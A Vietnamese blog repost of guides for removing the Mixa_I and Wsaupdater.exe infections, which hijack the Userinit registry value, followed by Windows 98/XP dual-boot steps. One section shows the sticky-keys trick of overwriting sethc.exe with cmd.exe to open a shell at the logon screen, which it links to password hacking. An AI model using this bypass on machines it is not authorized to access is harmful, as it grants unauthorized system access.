-Đặc biệt:sau vài lần restart máy thì sẽ không log on vào win đc nữa, bị log off liên tục!
…còn hiện tương gì nữa thì..hạ hồi phân giải nhá!hehehe…quan trọng nhất là…..-->
Cách diệt như sau:
Cách 1: Do con virus không cho vào Windows nữa nên chúng ta cần dùng đến đĩa CD
-Dùng đĩa Hiren’s Boot :sử dụng DOS có hỗ trợ NTFS (nếu ổ đĩa của bạn chia theo định dạng này)
+ Xóa tất cả các file autorun.inf, Mixa_I.exe trong tất cả các ổ đĩa
+ Xóa C:\Windows\Mixa.exe
+ Xóa C:\Windows\System32\systemio.exe
+ Copy C:\Windows\System32\Userinit.exe sang ổ D:\Userinit.exe
+ Đổi tên D:\Userinit.exe thành D:\systemio.exe
+ Move D:\systemio.exe sang C:\Windows\System32\
-Khởi động Windows: lúc này bạn đã có thể log on vào windows đc rồi đấy!
+ Run: regedit.exe tìm đến khóa HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run
xóa Value “virus” bên phải.
Tiếp tục tìm đến HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Winlogon, nhìn sang phải :nhấp đúp vào “Userinit” thay đổi vềgiá trị mặc định “C:\Windows\System32\Userinit,” ( lưu ý: có dấu phẩy sau cùng! )
-Vào C:\Windows\System32\ xóa systemio.exe
Cách 2:
Muốn diệt được con này,trước tiên các bạn phải có 1 đĩa BartPE và cách diệt của nó cũng nằm ở đây : http://windowsxp.mvps.org/peboot.htm .Các bạn down BartPE về, dùng đĩa win bạn đang xài để tạo 1 file .iso sau đó các bạn dùng chương trình để burn file .iso đó ra đĩa cd,vậy là các bạn đã có 1 OS mini on CD rồi nhé,tiếp đến các bạn cho boot từ cd để chạy win mini (OS BartPE) rồi làm theo hướng dẫn:
(mọi người tham khảo tiếng Anh trước nhé):
Scenario - Incorrect registry value preventing you from logging on to your user account in Windows XP ?
In this example, a basic BartPE CD without any Plugins, has been used for illustration purposes. You may add as many Plugins as you want, depending upon your needs.
Verifying and fixing the Userinit value in the registry
1. Insert the BartPE CD into the drive, and boot the system from the CD. Once the file loading phase is over, the Bart PE desktop will be visible, as shown in Figure 1.
2. Type Regedit.exe in the prompt, and press Enter. Select the HKEY_USERS hive
3. From the File menu, choose the Load Hive option. Browse to your Windows installation drive, for example the following location:
C:\Windows\System32\Config\
4. Select the file named SOFTWARE (the file without any extensions), and click Open
5. Type a name for the hive that you've loaded now. (Example: MyXPHive)
6. Now the SOFTWARE hive is loaded, and present under the HKEY_USERS base hive.
7. In order to fix the Userinit value in the loaded hive, navigate to the following location:
HKEY_USERS \ MyXPHive \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon
8. Double-click Userinit and set it's value correctly. Example: Set it's data as follows:
C:\Windows\System32\Userinit.exe,
(Include the trailing comma also. The above assumes that Windows is installed in C:\Windows, and Userinit.exe file is actually present in the System32 folder. You may want to verify that as well.)
9. After entering the correct data, you MUST unload the Hive. To do so, select MyXPHive branch, and then in the File menu, choose Unload Hive. It's important to note that you'll need to select the MyXPHive branch first, before unloading it.
10. Quit BartPE and restart Windows. See if you're able to logon to your profile.
If your PC is a victim of the Malware discussed in this article, and unable to login to your profile, then you'll need to fix the registry as discussed there. As you're unable to login, registry modification can only be done from a remote system, or via offline registry editing. This article discusses about offline registry editing.
Cách khác :
SỬ DỤNG RECOVERY CONSOLE
Bước 1. Thay thế, đổi tên tập tin userinit.exe bằng Recovery Console.
Khởi động máy với đĩa CD cài đặt Windows. Nhấn phím bất kỳ khi xuất hiện thông báo Press any key to boot from CD.
Trong màn hình Welcome to setup, nhấn phím R (Repair) để khởi động Recovery Console (RC).
Nếu hệ thống cài đặt nhiều hệ điều hành (HĐH) khác nhau, chọn HĐH bị lỗi cần khắc phục (lưu ý: nếu nhấn Enter khi chưa chọn HĐH, chương trình sẽ tự khởi động lại máy).
Nhập mật khẩu của tài khoản thuộc nhóm quản trị (Administrators).
Tại dấu nhắc của RC, gõ các dòng lệnh sau (nhấn Enter sau mỗi dòng lệnh).
cd system32
copy userinit.exe wsaupdater.exe
exit
Bước 2. Khởi động lại máy tính, bạn đã có thể đăng nhập Windows ở chế độ bình thường.
Chọn Start. Run, gõ dòng lệnh regedit và nhấn OK để mở cửa sổ Registry Editor.
Trong khung trái Registry Editor, tìm đến nhánh HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Ở khung phải, tìm đến mục userinit, nhấn phải chuột trên mục này chọn modify.
Thay thế tập tin wsaupdater.exe bằng userinit.exe, (bao gồm cả dấu “,”) trong mục Value data (thông tin đúng trong trường hợp này là C:\WINDOWS\system32\userinit.exe,) (hình 1)
Chọn OK và đóng Registry Editor.
Bước 3. Xóa tập tin wsaupdater.exe
Khởi động lại máy tính, đăng nhập Windows bằng tài khoản thuộc nhóm quản trị (Administrators).
Chọn Start. Run, gõ dòng lệnh %Windir%\system32, nhấn OK (hoặc mở Windows Explorer, tìm đến thư mục Windows\System32)
Tìm tập tin wsaupdater.exe trong thư mục Windows\System32, chọn Delete, nhấn OK xác nhận xóa.
Ghi chú. Việc chỉnh sửa các thông số Registry đòi hỏi phải được thực hiện hết sức cẩn trọng vì chỉ một sơ suất nhỏ cũng có thể khiến Windows hoạt động bất thường, thậm chí không thể đăng nhập được. Do vậy, trước khi tiến hành bất kỳ một chỉnh sửa nào, hãy sao lưu lại cấu hình Registry hiện tại theo các hướng dẫn trong bài “Chăm sóc và bảo dưỡng Windows Registry” (ID: A0205_90).
Thông tin khác :
Hôm nay em search ở google thì tìm thấy thông tin về hiện tượng này ở trang của Microsoft, nó đây:
CAUSE
Wsaupdater.exe is spyware that changes Userinit.exe, to Wsaupdater.exe in the registry. Ad-Aware by Lavasoft removes the Wsaupdater.exe file from the computer, but it cannot change the registry subkey back to Userinit.exe,. The registry subkey that is changed is
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Value: Userinit
Data: %Windir%\System32\Wsaupdater.exe
Note %windir% represents the location of the System32 folder. For example, if the location is C:\Windows\System32, the data would be C:\Windows\System32\Wsaupdater.exe.
The data should contain Userinit.exe, instead of Wsaupdater.exe. In the previous example, the data would be C:\Windows\System32\Userinit.exe,.
Như vậy nguyên nhân là do con Wsaupdater.exe gây ra, nhưng trong bài hướng dẫn của Microsoft chỉ nói cách sửa lại Registry và xóa file Wsaupdater.exe trong thư mục system32. Điều em hỏi là: Nguyên nhân do đâu mà con Wsaupdater.exe nó chui vào thư mục System32 được, và liệu nếu chỉ xóa 1 file Wsaupdater.exe thì nó có chết ko hay còn các biến thể khác, hiện máy em cài Bitdefender10, có lúc lại cài NOD32, nhưng rốt cục quét ko thấy virus hay spyware, em chưa thử các phần mềm AntiSpy. Bác nào biết cách diệt con này thì post lên anh em xem với
Tuyệt chiêu của Mr Cường :
Virus Mixa_I từ những ngày đầu xuất hiện, tôi đã có source và thấy nó khá nguy hiểm nên đã viết bài hướng dẫn trên Blog cá nhân!
Bài viết ở trên copy từ Blog của tôi nhưng rất nhiều bạn đã ko ghi nguồn gốc !! ( hỡi ôi! dân việt nam ...)
Hiện nay tôi đã có biện pháp trị các con virus không cho logon vào máy (bất kể loại nào, ko riêng gì Mixa_I )
Đặc điểm của loại virus này là thay đổi giá trị Registry tại khóa :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
"Userinit"="C:\\Windows\\system32\\userinit.exe," ( có dấu " , " ở cuối )
để chỉ đến files của chính nó ( virus ).
Vậy : Ta chỉ cần chỉnh sửa giá trị Userinit về giá trị mặc định thì sẽ lại logon được!
Nhưng : làm thế nào để vào Registry khi ko logon được ?Chúng ta sẽ lơi dụng lỗ hổng của file sethc.exe ( Xem lại bài :Hack Password Administrators )
Các bước thực hiện:
B1: Khởi động từ đĩa Hiren's Boot, sử dụng chương trình quản lý file trong Hiren's Boot để vào thư mục System32
B2: Thay thế file Sethc.exe bằng cmd.exe (bằng cách gõ: copy cmd.exe sethc.exe /y)
B3: Lấy đĩa Hiren's Boot ra và Khởi động lại máy
B4: Tại cửa sổ Logon, nhấn Shilt 5 lần để hiện cửa sổ Command Line
B5: gõ vào regedit.exe
B6: Duyệt đến khóa :HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
sửa lại giá trị mặc định là:
"Userinit"="C:\\Windows\\system32\\userinit.exe,
p/s : Bạn nào ko thực hiện được thì...THANKS cho tôi ..vài trăm cái, tối nay về viết TUT có ảnh minh họa! ^^
--------------------------------------------------------------------------------
thay đổi nội dung bởi: Mr.Cuong, 02-04-2008 lúc 01:06 PM.
--------------------------------------------------------------------------------
HomePage: http://banbeit.com
Email: Mr.Cuong@banbeit.com
Mobile: 0907.527.027
________________________________________
Thứ Tư, 6 tháng 2, 2008
Install Windows 98 after XP
Nếu Primary Partition là Fat 32, bạn làm như sau:
1.Trước tiên, bạn vào Win98 tạo 1 đĩa mềm khởi động, rồi chép thêm vào đĩa đó 3 files “debug.exe”, “read.scr” và “sysXPfat.com”.
2.Xong, bạn boot bằng đĩa mềm đó, tại dấu nhắc A:\ đánh lịnh: "debug
3.Restart lại máy, tại dấu nhắc A:\ đánh lịnh:sysxpfat c:để tạo lại MBR cho WinXP.Lấy đĩa mềm ra, Restart lại máy, bạn sẽ có Dual Menu để vào Win98 hoặc XP.
Note:
-File “debug.exe” có trong folder “Windows\Command” của Win98.
-File “read.scr”, bạn tự tạo bằng cách mở Notepad nhập vào các dòng lịnh sau:
L 100 2 0 1
N C:\BOOTSECT.DOS
R BX
0
R CX
200
W
Q
Xong save lại với Save as type là All file, File name là “read.scr”.
-File “sysXPfat.com” (930 bytes) có trong các đĩa Hiren’s BootCD hoặc trong các đĩa LHT.
Chúc bạn thành công.
1.Trước tiên, bạn vào Win98 tạo 1 đĩa mềm khởi động, rồi chép thêm vào đĩa đó 3 files “debug.exe”, “read.scr” và “sysXPfat.com”.
2.Xong, bạn boot bằng đĩa mềm đó, tại dấu nhắc A:\ đánh lịnh: "debug
3.Restart lại máy, tại dấu nhắc A:\ đánh lịnh:sysxpfat c:để tạo lại MBR cho WinXP.Lấy đĩa mềm ra, Restart lại máy, bạn sẽ có Dual Menu để vào Win98 hoặc XP.
Note:
-File “debug.exe” có trong folder “Windows\Command” của Win98.
-File “read.scr”, bạn tự tạo bằng cách mở Notepad nhập vào các dòng lịnh sau:
L 100 2 0 1
N C:\BOOTSECT.DOS
R BX
0
R CX
200
W
Q
Xong save lại với Save as type là All file, File name là “read.scr”.
-File “sysXPfat.com” (930 bytes) có trong các đĩa Hiren’s BootCD hoặc trong các đĩa LHT.
Chúc bạn thành công.
Đăng ký:
Bài đăng (Atom)
